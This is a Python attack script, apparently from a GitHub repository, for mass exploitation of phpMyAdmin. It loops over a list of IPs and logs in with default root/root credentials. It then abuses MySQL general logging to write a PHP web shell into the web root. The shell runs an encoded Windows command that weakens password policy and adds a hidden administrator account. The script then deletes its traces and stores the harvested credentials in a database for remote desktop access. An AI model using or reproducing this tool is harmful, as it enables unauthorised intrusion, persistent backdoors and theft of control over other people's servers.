-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathPHPMYADMIN-exp.py
138 lines (123 loc) · 4.48 KB
/
PHPMYADMIN-exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
import re
import time
import base64
import string
import random
import pymysql
import datetime
import requests
from bs4 import BeautifulSoup
def get_ip_list():
with open('ip.txt','r')as f:
ip_list = f.readlines()
return ip_list
def get_token(ip):
url = 'http://'+ip+'/phpmyadmin/index.php'
y = requests.get(url,timeout = 1)
token = re.search('token=.*" t',y.text).group()[6:-3]
cookie_1 =y.cookies
return url,token,cookie_1
def login(url,token,cookie_1):
payload = {'pma_username': 'root', 'pma_password': 'root','server':'1 ','lang':'zh_CN','token':token}
r = requests.post(url,data=payload,cookies = cookie_1,allow_redirects=False)
cookie_2 = r.cookies
if 'name="login_form"' not in r.text:
print('使用默认密码登录成功!')
return cookie_2
else:
print('登录失败!')
return False
def get_cookie(cookie_1,cookie_2):
dict_1 = requests.utils.dict_from_cookiejar(cookie_1)
dict_2 = requests.utils.dict_from_cookiejar(cookie_2)
dict_3 = dict(dict_1,**dict_2)
cookies = requests.utils.cookiejar_from_dict(dict_3)
return cookies
def execute_sql(token,ip,cookies):
sql_url = 'http://' + ip + '/phpmyadmin/import.php'
text = ['select @@datadir','SET GLOBAL general_log=ON',
'set global general_log=off;set global general_log_file="MYSQL.log";']
def modle(sql_text):
data = {'token': token, 'sql_query': sql_text}
sql = requests.post(sql_url, data=data, cookies=cookies)
soup = BeautifulSoup(sql.text, 'lxml')
tag = soup.find_all('td')
for i in tag:
if i.string:
print(i.string)
result = i.string
return result
def get_path():
path = modle(text[0])
path = re.search('.*M', path).group()[:-1].replace('\\','/')+'www/phpinfo.php'
print(path)
return path
def create_file():
file_path = 'set global general_log_file ="'+ get_path()+'"'
modle(file_path)
print(file_path)
modle(text[1])
def random_str():
random_str = ''.join(random.sample(string.ascii_letters, 8))
return random_str
def generate_random_exp():
user = random_str() + '$'
pwd = random_str()
exp = '''echo [version] > 1.inf && echo signature="$CHICAGO$" >> 1.inf &&
echo [System Access] >> 1.inf && echo PasswordComplexity = 0 >> 1.inf && secedit
/configure /db temp.sdb /cfg 1.inf & net user ''' + user+ ' ' + pwd + ''' /add & net
localgroup administrators ''' + user + ''' /add && echo GetSuccess! & del 1.inf
temp.sdb phpinfo.php && echo DeleteSuccess! '''
exp_base64 = base64.b64encode(exp.encode('utf-8')).decode('utf-8')
exp_code = '''select '<?php $str ="''' + exp_base64 + '''"; $code = base64_decode($str)
;echo `$code`;?>';'''
modle(exp_code)
return user, pwd
def check_exp():
url_2 = 'http://' + ip + '/phpinfo.php'
check = requests.get(url_2)
time.sleep(5)
print(check.text)
if 'GetSuccess!' in check.text:
print('Success !!!')
return ip
else:
print('Failed !')
def delete():
modle(text[2])
create_file()
user,pwd = generate_random_exp()
if check_exp() is None:
return False
delete()
return user,pwd,ip
def main():
db = pymysql.Connect('ip', 'user', 'pwd', 'phpmyadmin')
cursor = db.cursor()
ip_list =get_ip_list()
for ip in ip_list:
try:
ip = ip.strip()
url, token, cookie_1 = get_token(ip)
print(ip)
if len(token) != 32:
print('token 错误!')
continue
cookie_2 = login(url, token, cookie_1)
if cookie_2 is False:
continue
cookies = get_cookie(cookie_1, cookie_2)
user, pwd, ip = execute_sql(token, ip, cookies)
if user and pwd and ip:
time_now = str(datetime.datetime.now())[:-7]
sql = "insert into rdesktop (user,pwd,ip,time) VALUES ('%s','%s','%s','%s')" % (user,pwd,ip,time_now)
print(sql)
cursor.execute(sql)
db.commit()
else:
continue
except Exception as e:
print(e)
db.close()
if __name__=='__main__':
main()